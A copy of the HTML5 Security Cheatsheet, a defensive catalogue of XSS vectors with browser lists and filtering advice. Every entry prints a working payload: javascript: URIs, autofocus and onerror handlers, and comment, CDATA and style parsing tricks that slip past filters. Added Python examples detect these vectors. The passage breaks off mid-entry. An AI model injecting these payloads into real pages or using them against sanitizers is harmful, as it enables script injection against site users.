HTML5 Security Cheatsheet - xss cheat sheet

HTML5 Security Cheatsheet: What your browser does when you look away...

HTML5 feature vectors

XSS via formaction - requiring user interaction (1) (#1)

This vector shows one way to hijack a form from outside it using the HTML5 "form" and "formaction" attributes.

<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>

Don't allow users to submit markup containing "form" and "formaction" attributes. Avoid <FORM> elements with an "id" attribute and submit buttons inside them.

Browsers: firefox 4.0, firefox 15.0, opera 10.5, opera 11.0, opera 12.0, opera mobile, chrome 10.0, chrome 23.0, safari 4.0.4, safari 5.1.7

Tags: xss, html5, opera, chrome, firefox, formaction, javascript, button

Links: http://www.whatwg.org/specs/web-apps/current-work/multipage/association-of-controls-and-forms.html#attr-fs-formaction

Author: .mario

Triggering the element's own focus event via the autofocus attribute (#7)

This vector moves focus to the input element automatically, firing the focus event - no user interaction required.

<input onfocus=write(1) autofocus>

Check user submitted content for the "autofocus" attribute.

Browsers: firefox 4.0, firefox 15.0, opera 9.0, opera 10.0, opera 11.0, opera 12.0, safari 4.0, safari 5.0, safari 5.1.7, chrome 4.0, chrome 5.0, chrome 6.0, chrome 7.0, chrome 8.0, chrome 9.0, chrome 10.0, chrome 23.0, internet explorer 10.0

Tags: xss, autofocus, chrome, opera

Links: http://www.w3.org/Bugs/Public/show_bug.cgi?id=9602 , http://www.whatwg.org/specs/web-apps/current-work/multipage/association-of-controls-and-forms.html#autofocusing-a-form-control

Author: Gareth

Triggering the blur event via multiple autofocus attributes competing for focus (#8)

Here two HTML input elements compete for focus; when focus moves to the second input, the first one fires its blur event.

<input onblur=write(1) autofocus><input autofocus>

Check user submitted content for the "autofocus" attribute.

Browsers: safari 4.0, safari 5.0, safari 5.1.7, chrome 4.0, chrome 5.0, chrome 6.0, chrome 7.0, chrome 8.0, chrome 9.0, chrome 10.0, chrome 23.0

Tags: xss, autofocus, blur, chrome, safari

Links: http://www.w3.org/Bugs/Public/show_bug.cgi?id=9602 , http://www.whatwg.org/specs/web-apps/current-work/multipage/association-of-controls-and-forms.html#autofocusing-a-form-control

Author: .mario

JavaScript execution via the <VIDEO> poster attribute (#10)

Opera 10.5+ allows javascript: URIs in the poster attribute. This bug was fixed in Opera 11.

<video poster=javascript:alert(1)//></video>

Make sure the <VIDEO> poster attribute only contains relative URIs, HTTP URIs or correctly MIME-typed data URIs.

Browsers: opera 10.5, opera 11.00, opera 11.01

Tags: xss, poster, video, opera, html5

Author: .mario

JavaScript execution via <BODY> onscroll triggered by autofocus (#12)

This vector uses autofocus to move focus away, which scrolls the page and thereby fires the <BODY> onscroll event.

<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>

Browsers: firefox 4.0, firefox 15.0, opera 9.0, opera 10.0, opera 11.0, opera 12.0, safari 4.0, safari 5.0, safari 5.1.7, chrome 4.0, chrome 5.0, chrome 6.0, chrome 7.0, chrome 8.0, chrome 9.0, chrome 10.0, chrome 23.0

Tags: xss, autofocus, scroll, chrome, opera

Links: http://www.w3.org/Bugs/Public/show_bug.cgi?id=9602

Author: .mario

Form surveillance with onformchange, onforminput and form attributes (#23)

Enter a value into the form element to see how "onforminput" and "onformchange" attributes can monitor <FORM> activity - even from outside the <FORM> via the form attribute on a <BUTTON> element.

<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>

Make sure users cannot submit markup including the form, "onformchange" and "onforminput" attributes. Do not give <FORM> elements an "id" attribute.

Browsers: opera 10.5, opera 11.0, opera 12.0, opera mobile

Tags: surveillance, javascript, opera, html5, onforminput, onformchange

Links: http://www.whatwg.org/specs/web-apps/current-work/multipage/association-of-controls-and-forms.html#broadcast-formchange-events

Authors: Skyphire, .mario

JavaScript execution via <VIDEO> and <SOURCE> tag (1) (#55)

Opera 10.5+ and Chrome allow error handlers in <SOURCE> tags if encapsulated by a <VIDEO> tag. The same works for <AUDIO> tags.

<video><source onerror="alert(1)">

Make sure user submitted <SOURCE> tags cannot contain event handlers or whitelist event handlers necessary for UI controls.

Browsers: opera 10.5, opera 11.0, opera 12.0, chrome 4.0, chrome 5.0, chrome 6.0, chrome 7.0, chrome 8.0, chrome 9.0, chrome 10.0, chrome 25.0, firefox 4.0, firefox 15.0

Tags: xss, javascript, video, source, html5, opera, chrome, audio

Author: .mario

JavaScript execution via <VIDEO> and <SOURCE> tag (2) (#56)

Firefox 3.5+ allows error handlers in <VIDEO> tags when applied together with a <SOURCE> tag. The same works for <AUDIO> tags. On Firefox 4+ the <SOURCE> tag is irrelevant to trigger the error event. This happens because of the implicit "src" attribute in the <VIDEO> tag when the page has a number sign (#) in the URL.

<video onerror="alert(1)"><source></source></video>

Make sure user submitted <AUDIO> and <VIDEO> tags cannot contain event handlers or whitelist event handlers necessary for UI controls.

Browsers: firefox 3.5, firefox 3.6, firefox 4.0, firefox 15.0, internet explorer 9.0, internet explorer 10.0

Tags: xss, javascript, video, source, html5, firefox, audio

Author: .mario

XSS via formaction - requiring user interaction (2) (#72)

A vector displaying the HTML5 "formaction" capabilities for form hijacking. Note that this variation does not use the "id" and "form" attributes to connect button and form.

<form><button formaction="javascript:alert(1)">X</button>

Don't allow users to submit markup containing "form" and "formaction" attributes or transform them to bogus attributes.

Browsers: firefox 4.0, firefox 15.0, opera 10.5, opera 11.0, opera 12.0, opera mobile, chrome 10.0, chrome 23.0, safari 4.0.4, safari 5.1.7, internet explorer 10.0

Tags: xss, html5, opera, formaction, javascript, button

Links: http://www.whatwg.org/specs/web-apps/current-work/multipage/association-of-controls-and-forms.html#attr-fs-formaction

Author: .mario

Passive JavaScript execution via <BODY> and oninput attribute (#86)

All browsers besides Internet Explorer 9 and below support the "oninput" event handler around form elements like the given <INPUT>. The event works for the form element itself, the surrounding form and the <BODY> as well as <HTML> tags.

<body oninput=alert(1)><input autofocus>

Do not whitelist "oninput" attributes in user submitted markup.

Browsers: firefox 3.6, firefox 4.0, firefox 15.0, safari 4.0, safari 5.0, safari 5.1.7, chrome 4.0, chrome 5.0, chrome 6.0, chrome 7.0, chrome 8.0, chrome 9.0, chrome 10.0, chrome 23.0, opera 9.0, opera 10.0, opera 11.0, opera 12.0, opera mobile, internet explorer 10.0

Tags: xss, javascript, html5, oninput, form, passive, event

Author: Skyphire

Passive JavaScript execution via MathML on Firefox (#130)

Modern Firefox versions allow usage of inline MathML. While other user agents don't support the href attribute for MathML elements (yet), Firefox does and thereby enables passive JavaScript execution. Note that supporting href for MathML elements is a feature - introduced with MathML 3. The same effect can be observed by using xlink:href. The statusline action further enables obfuscation of the actual link target - and in this example hides the JavaScript URI.

<math href="javascript:alert(1)">CLICKME</math><math><!-- up to FF 13 --><maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction><!-- FF 14+ --><maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction></math>

Do not allow users to submit unfiltered MathML content.

Browsers: firefox 6, firefox 7, firefox 8, firefox 9, firefox 10, firefox 11, firefox 15

Tags: mathml, xss, inline, firefox

Links: http://www.w3.org/Math/ , https://bugzilla.mozilla.org/show_bug.cgi?id=534968 , see also #87

Author: .mario

Transparent overwriting of request-data using HTML5 "dirname" attributes (#136)

Opera and Chrome support the HTML5 attribute "dirname", that can be used to have the browser communicate the text-flow direction of another input element by adding it to the server-sent request body. By injecting a "dirname" attribute in an existing form, an attacker can overwrite user input and thereby make it guessable for malicious purposes. The overwritten value would then be "ltr" or "rtl" - depending on the actual text-flow direction. The "dirname" attribute is not yet supported by Internet Explorer or Firefox.

<form action="" method="post"><input name="username" value="admin" /><input name="password" type="password" value="secret" /><input name="injected" value="injected" dirname="password" /><input type="submit"></form>

Avoid white-listing the "dirname" attribute in user generated content. The effects on existing forms are hard to predict and might cause privacy problems and information leaks.

Browsers: opera 12.0, chrome 22.0, chrome 23.0, chrome 24.0, chrome 25.0

Tags: html5, dirname, privacy, http, form, infoleak

Links: http://dev.w3.org/html5/spec/common-input-element-attributes.html#the-dirname-attribute , http://html5sec.org/dirname/

Author: .mario
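To see what the injected "dirname" attribute does on the server side, here is an added example in Python (not part of the cheatsheet). The request body is constructed from the behaviour described above, not captured traffic: the injected input carries dirname="password", so a supporting browser appends a second "password" field holding the text direction. A parser that keeps the last value ends up storing "ltr" as the password; counting repeated protected fields detects the overwrite so the request can be rejected.

```python
from collections import Counter
from urllib.parse import parse_qsl

# Constructed request body (not captured traffic): what a browser that supports
# "dirname" submits for the vector above. The injected <input> has
# dirname="password", so the browser appends a second password field carrying
# the text direction ("ltr" or "rtl") right after the injected field.
DIRNAME_BODY = "username=admin&password=secret&injected=injected&password=ltr"
CLEAN_BODY = "username=admin&password=secret"


def parse_fields(body):
    """Decode the x-www-form-urlencoded body, keeping repeated names in order."""
    return parse_qsl(body, keep_blank_values=True)


def last_wins(body):
    """What a framework that collapses repeated names to the last value stores."""
    return dict(parse_fields(body))


def repeated_fields(body):
    """Names submitted more than once; a single dirname injection adds exactly one."""
    counts = Counter(name for name, _ in parse_fields(body))
    return [name for name, n in counts.items() if n > 1]


def check_submission(body, protected):
    """Protected fields whose value cannot be trusted because they were repeated.

    The server should reject the whole request rather than pick one of the values.
    """
    return [name for name in repeated_fields(body) if name in protected]


if __name__ == "__main__":
    print(last_wins(DIRNAME_BODY))  # password is now 'ltr', not 'secret'
    print(check_submission(DIRNAME_BODY, {"username", "password"}))  # ['password']
    print(check_submission(CLEAN_BODY, {"username", "password"}))  # []
```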

HTML4 and other older vectors

JavaScript execution via <FRAMESET> and onload (#31)

This classic vector shows that several tags don't need a "src" attribute to fire onload events, such as <IFRAME>, <BODY> and <FRAMESET>.

<frameset onload=alert(1)>

Be sure to work with whitelists when allowing users to submit markup - otherwise ancient tags like <FRAMESET> might be forgotten when filtering and escaping.

Browsers: internet explorer 5.0, internet explorer 6.0, internet explorer 7.0, internet explorer 8.0, internet explorer 9.0, internet explorer 10.0, opera 8.x, opera 9.0, opera 10.0, opera 11.0, opera 12.0, opera mobile, firefox 1.x, firefox 2.0, firefox 3.0, firefox 4.0, firefox 15.0, chrome 3.0, chrome 4.0, chrome 5.0, chrome 6.0, chrome 7.0, chrome 8.0, chrome 9.0, chrome 10.0, chrome 23.0, safari 3.0, safari 4.0, safari 5.0, safari 5.1.7

Tags: xss, javascript, frames, classic, html, onload

Author: .mario

JavaScript execution via <TABLE> and background (#32)

Opera 8-10.5+ as well as Internet Explorer 6 support JavaScript URIs for <TABLE> and some other tags' "background" attributes. This causes JavaScript execution without user interaction. The problem has been fixed in Opera 11.

<table background="javascript:alert(1)"></table>

In case evil attributes like event handlers are being filtered from user submitted markup make sure not to forget "background" - among others.

Browsers: internet explorer 6.0, opera 8.x, opera 9.0, opera 10.0, opera 11.01, opera mobile

Tags: xss, javascript, background, classic, html, table

Author: .mario

HTML comment parsing issues (1) (#37)

This vector shows how comments are being parsed and what problems can arise in case user submitted HTML is allowed to contain comments.

<!--<img src="--><img src=x onerror=alert(1)//">

Make sure comments are not allowed in user submitted html. The markup should be checked for security issues after comments have been stripped out - not before.

Browsers: internet explorer 5.0, internet explorer 6.0, internet explorer 7.0, internet explorer 8.0, internet explorer 9.0, internet explorer 10.0, opera 8.0, opera 9.0, opera 10.0, opera 11.0, opera 12.0, opera mobile, firefox 1.0, firefox 2.0, firefox 3.0, firefox 4.0, firefox 15.0, chrome 3.0, chrome 4.0, chrome 5.0, chrome 6.0, chrome 7.0, chrome 8.0, chrome 9.0, chrome 10.0, chrome 23.0, safari 3.0, safari 4.0, safari 5.0, safari 5.1.7

Tags: xss, javascript, comment, parsing, attributes

Authors: sirdarckcat, .mario

HTML comment parsing issues (2) (#38)

Besides <!-- --> comments, Internet Explorer allows the use of <COMMENT> tags. The vector shows how comments are being parsed and what problems can arise in case user submitted HTML is allowed to contain comments. This example works up to IE 8 standards mode.

<comment><img src="</comment><img src=x onerror=alert(1)//">

Make sure <COMMENT> tags are not allowed in user submitted html. The markup should be checked for security issues after <COMMENT> tags have been stripped out or escaped - not before.

Browsers: internet explorer 5.0, internet explorer 6.0, internet explorer 7.0, internet explorer 8.0, internet explorer 9.0, internet explorer 10.0

Tags: xss, javascript, comment, parsing, attributes

Author: .mario

CDATA section parsing issues (#39)

Firefox and Opera allow the use of CDATA section delimiters in HTML - both in the stripped form "<![" and with padding like "<![CDATA[". This can cause problems for filter mechanisms since those delimiters can be used for massive obfuscation. Firefox 4 and Opera 11.60 have fixed the issue. However, modern browsers have separate XML parsers for inline SVG or MathML, which allow the use of CDATA sections (including a slightly irregular shape).

<!-- up to Opera 11.52, FF 3.6.28 --><![><img src="]><img src=x onerror=alert(1)//"><!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ --><svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>

Make sure CDATA delimiters are not allowed in user submitted HTML. The markup should be checked for security issues after CDATA sections and delimiters have been stripped out or escaped - not before.

Browsers: opera 8.0, opera 9.0, opera 10.0, opera 11.0, opera 12.0, opera mobile, firefox 1.x, firefox 2.0, firefox 3.0, firefox 4.0, firefox 15.0, internet explorer 9.0, internet explorer 10.0, chrome 7.0, chrome 23.0, safari 4.0.4, safari 5.1.7

Tags: xss, javascript, cdata, parsing, attributes, math, svg, inline

Author: LeverOne

Plaintext tags used for markup obfuscation (#40)

This vector works on all tested user agents and shows how several filtering solutions can be tricked into accepting malicious HTML. A badly written filter will assume the error handler is part of the first image's "src" attribute and accept the incoming data.

<style><img src="</style><img src=x onerror=alert(1)//">

Don't rely on weak regular expressions for markup filtering. Use whitelists for allowed tags and rely on a filter solution based on a heavily tested tokenizer/parser.

Browsers: internet explorer 5.0, internet explorer 6.0, internet explorer 7.0, internet explorer 8.0, internet explorer 9.0, internet explorer 10.0, opera 8.x, opera 9.0, opera 10.0, opera 11.0, opera 12.0, opera mobile, firefox 1.x, firefox 2.0, firefox 3.0, firefox 4.0, firefox 15.0, chrome 3.0, chrome 4.0, chrome 5.0, chrome 6.0, chrome 7.0, chrome 8.0, chrome 9.0, chrome 10.0, chrome 23.0, safari 3.0, safari 4.0, safari 5.0, safari 5.1.7

Tags: xss, javascript, plaintext, tags, parsing, attributes

Author: LeverOne
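The mitigations above keep returning to the same advice: whitelist tags and attributes, restrict URL schemes, and decide only after a real tokenizer has seen the markup, so that comment bodies, <STYLE> raw text and marked sections cannot hide an attribute from the filter. The following Python audit is an added example (not part of the cheatsheet) that applies that advice with the standard-library html.parser tokenizer to several of the vectors listed above; the allowlists are assumptions for illustration and would be tailored per application.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Allowlist (assumed for illustration): anything not listed is rejected, so
# formaction, autofocus, dirname, background, poster and every on* handler fail by omission.
ALLOWED_TAGS = {"p", "b", "i", "a", "img", "ul", "ol", "li", "br", "table", "tr", "td"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}, "td": {"colspan"}}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"", "http", "https"}  # "" covers relative URLs

def safe_url(value):
    """Accept relative, http and https URLs only (javascript:, data:, vbscript: fail)."""
    return urlsplit(value.strip()).scheme.lower() in SAFE_SCHEMES

class Auditor(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []  # every allowlist violation seen in the token stream

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.findings.append(f"tag <{tag}> not allowed")
            return
        for name, value in attrs:  # values arrive already entity-decoded
            if name not in ALLOWED_ATTRS.get(tag, set()):
                self.findings.append(f"attribute {name!r} on <{tag}> not allowed")
            elif name in URL_ATTRS and not safe_url(value or ""):
                self.findings.append(f"unsafe URL in {name!r}: {value!r}")

    handle_startendtag = handle_starttag  # <img ... /> gets the same treatment

    def handle_comment(self, data):  # the comment body is never re-read as markup
        self.findings.append("comment not allowed")

    def unknown_decl(self, data):  # <![CDATA[ ... ]]> and other marked sections
        self.findings.append("marked section not allowed")

def audit(markup):
    """Return the reasons the markup must be rejected (empty list = clean)."""
    parser = Auditor()
    try:
        parser.feed(markup)
        parser.close()
    except Exception as exc:  # markup the tokenizer cannot make sense of is rejected too
        parser.findings.append(f"parse error: {exc}")
    return parser.findings

if __name__ == "__main__":
    # Vectors from the cheatsheet entries above, plus one benign fragment.
    for vector in (
        '<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>',
        '<!--<img src="--><img src=x onerror=alert(1)//">',
        '<p>hello <a href="https://example.com">link</a></p>',
    ):
        print(vector, "->", audit(vector) or "clean")
```

Because the comment and <STYLE> bodies are consumed by the tokenizer before any attribute is inspected, the trailing onerror handler in those vectors is seen as what it is, which is exactly the ordering the comment and plaintext entries ask for.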

Error handler via empty list-style and load handler via empty content (#41)

Opera 10.5+ and earlier versions fire an error event for <LI> tags in case the background URL set via the style attribute cannot be loaded. The same works with "list-style-image" too. On Opera 10.10 and earlier, more tag/style combinations like background:url() and background-image:url() work as well. A combination like content:url(svg) also works, but at the moment it is sensitive to events and <script> tags placed before and after it.

<li style=list-style:url() onerror=alert(1)></li><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>

Browsers: opera 8.0, opera 9.0, opera 10.0, opera 11.0, opera 12.0, opera mobile

Tags: xss, javascript, css, background, opera, onerror, content

Authors: LeverOne, .mario

Link hijacking via <BASE> and JavaScript URI (#42)

<BASE> link hijacking with JavaScript URIs works on Internet Explorer, Opera (O8-10.5, in case the link URL starts with #) and Safari. User interaction is required to execute the JavaScript. The vector sometimes has to be changed slightly to work for all mentioned user agents. Opera 11 ships a more or less working fix, but the problem continues to exist in forms that are difficult to exploit.

<head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>

User submitted HTML should not allow usage of <BASE> tags. In case they are necessary no non-HTTP/non-relative URL schemes should be allowed.

Browsers: opera 8.x, opera 9.0, opera 10.0, opera 10.63, safari 3.0, safari 4.0, safari 5.0, safari 5.1.7, internet explorer 5.5, internet explorer 6.0, internet explorer 7.0, internet explorer 8.0

Tags: xss, javascript, opera, internet explorer, base, hijacking

Authors: brainpillow, Gareth, .mario

JavaScript execution via <SCRIPT> for and event attributes (#48)

Internet Explorer allows using <SCRIPT> tags with "for" and "event" attributes to bind event data to specific HTML elements. The two shown attribute values cause script execution without user interaction. Opera simply ignores these attributes.

<SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>

Browsers: opera 10.0, opera 11.0, opera 12.0, opera mobile, internet explorer 6.0, internet explorer 7.0, internet explorer 8.0, internet explorer 9.0, internet explorer 10.0

Tags: xss, javascript, opera, for, event, internet explorer

Author: .mario

JavaScript execution via <OBJECT> DataURL attribute (#49)

Internet Explorer 9 and - in some situations - earlier versions support the use of JavaScript URIs for the "dataurl" attribute of a TDC Object. The JavaScript will be executed without any user interaction.

<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>

Browsers: internet explorer 6.0, internet explorer 7.0, internet explorer 8.0, internet explorer 9.0

Tags: xss, javascript, internet explorer, object, dataurl, TDS

Links: http://msdn.microsoft.com/en-us/library/ms531356%28v=VS.85%29.aspx#Understanding_the_TDC_Object_Model

Author: .mario

JavaScript execution via <OBJECT> data (#50)

Almost all browsers supporting data URIs allow executing JavaScript via crafted <OBJECT> "data" attribute value - even if base64 encoded.

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>

Make sure user submitted HTML cannot contain <OBJECT> tags or only whitelisted <OBJECT> "data" values.

Browsers: opera 8.x
